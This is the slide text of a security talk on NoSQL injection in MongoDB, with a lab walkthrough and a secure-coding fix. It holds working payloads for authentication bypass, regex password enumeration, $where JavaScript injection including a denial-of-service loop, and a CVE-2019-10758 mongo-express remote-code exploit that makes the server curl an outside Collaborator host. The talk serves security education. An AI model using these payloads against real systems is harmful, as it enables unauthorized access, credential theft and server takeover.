Let's review some code and understand how advanced injection attack NoSQLi occurs.

1. NoSql Injection
By Husseni Muzkkir
Date: 23/04/2020
Venue: Net Square
#TechieThursday

2. #WHOAMI
Security Analyst
LinkedIn @hussenimuzkkir
Twitter @MuzkkirHusseni
Muzkkir H.

3. Agenda
SQL vs NoSQL Databases
NoSQL Injection
LAB Creation
LAB Walkthrough
Insecure Coding and secure coding
CVE and exploits

4. Why NoSql Database ?
A relational database may require vertical and, sometimes horizontal expansion
of servers. What you require is a very agile delivery system that is easily
able to processes unstructured data. The system of engagement would need to be
extremely dynamic.
NoSQL allows for high-performance, agile processing of information at massive
scale. It stores unstructured data across multiple processing nodes, as well
as across multiple servers.
1. Key value Stores —> Riak, Voldemort, and Redis
2. Wide Column Stores —> Cassandra and HBase.
3. Document databases —> MongoDB and CouchDB.
4. Graph databases —> Neo4J and HyperGraphDB.

5. Data Store in SQL vs NoSQL
[ { "id" : 1,
"username" : "admin",
"password" : "P@$$w0rD",
"2FA" : "Enable" },
{ "id" : 2,
"username" : "user1",
"password" : "123456" },
{ "id" : 3,
"username" : "user2" } ]
id username password 2FA
1 admin P@$$w0rD Enable
2 user1 123456 null
3 user2 null null
SQL Database NoSQL Database

6. Query Structure
SQL:
SELECT * FROM table WHERE username = ‘$username’ AND password = ‘$password’
NoSQL:
db.collection.find({username: “$username”, password: “$password”});
Query Operators in NoSQL:
$ne -> not equal
$gt -> greater than
$regex -> regular expression
$where -> clause lets you specify a script to filter results

7. NoSQL Injection
NoSQL Injection is security vulnerability that lets attackers take control
of database queries through the unsafe use of user input. It can be used
by an attacker to: Expose unauthorized information. Modify data.
➢ db.items.find(queryObject)
○ db — current database object
○ Items — collection names ‘items’ in the current database
○ find — method to execute on the collection
○ queryObject — an object used to select data

8. LAB Creation
In this NoSQL Lab, I have implemented lab with actual and possible attack
scenarios.
1
VM LAB
Use Alpine or Ubuntu system
as per requirement.
Installed Dependencies
MongoDB and NodeJS
Installation.
2
Build Code
Create possible scenarios of
attack and write the code.
3
Run & Test
Deploy the code and try to
bypass the mechanism.
4

9. LAB Walkthrough
Possible Attack Vectors:
Authentication Bypass
Enumeration
Data manipulation
MongoDB Injection
DOS and more.

10. Authentication Bypass
id={"$ne":0}&email=muzkkir%40net-square.com&password=
","password":{"$ne":0},"email":"muzkkir@net-square.com

11. Authentication Bypass
Backend query will be:
{id: {"$ne":0}, email: "muzkkir%40net-square.com", password: "", "password": {"$ne":0},
"email": "muzkkir@net-square.com" }
Reason:
var query = "{ "_id" : "+id+","email": ""+email+"" , "password" : ""+password+"" }";
Fix:
Var query = { “_id” : id , ” email” : email , “password” : password }

12. Enumeration of Password
id={"$ne":0}&email=muzkkir%40net-square.com&password=","p
assword":{"$regex":"n*"},"email":"muzkkir@net-square.com

13. Enumeration of Password
"Password" : { "$regex" : "n*" }
"Password" : { "$regex" : "n8K*" }
"Password" : { "$regex" : "n8K!3*" }
"Password" : { "$regex" : "n8K!3p6" }
Enumerating other users password:
id={"$ne":0}&email=ravi%40net-square.com&password=","password":{"$regex":""}
,"email":"ravi@net-square.com

14. MongoDB Injection

15. MongoDB Injection
{ "$where": "1==1"}

16. MongoDB Injection
{"$where":"function(){return(version().length=='5');}"}

17. { "$where" : "function(){ return( version()[0] == '3' );}" }
{ "$where" : "function(){ return( version()[1] == '.' );}" }
{ "$where" : "function(){ return( version()[2] == '6' );}" }
{ "$where" : "function(){ return( version()[3] == '.' );}" }
{ "$where" : "function(){ return( version()[4] == '8' );}" }
Version = “3.6.8”
Other Functions:
sleep(500) -> Delay 5 seconds in response
If else condition -> run function to retrieve more information
Var i=1;while(1){use i=i+1} -> Resource Exhaustion (DOS)
MongoDB Injection

18. Data Injecting to change password

19. Data Injecting to change password
email=muzkkir@net-square.com&time=2:34:42","password":"123456

20. Insecure Code

21. Secure Code

22. Console Logs
InSecure Coding Query…
Secure Coding Query...

23. CVE-2019-10758
Vulnerability: mongo-express@0.53.0
Exploit: curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic
YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return
process")().mainModule.require("child_process").execSync("curl
http://cvbytcxi73hi1p93tya3ubmcm3stgi.burpcollaborator.net")'

24. Thanks!!
hussenimuzkkir
MuzkkirHusseni
Muzkkir H.
Net Square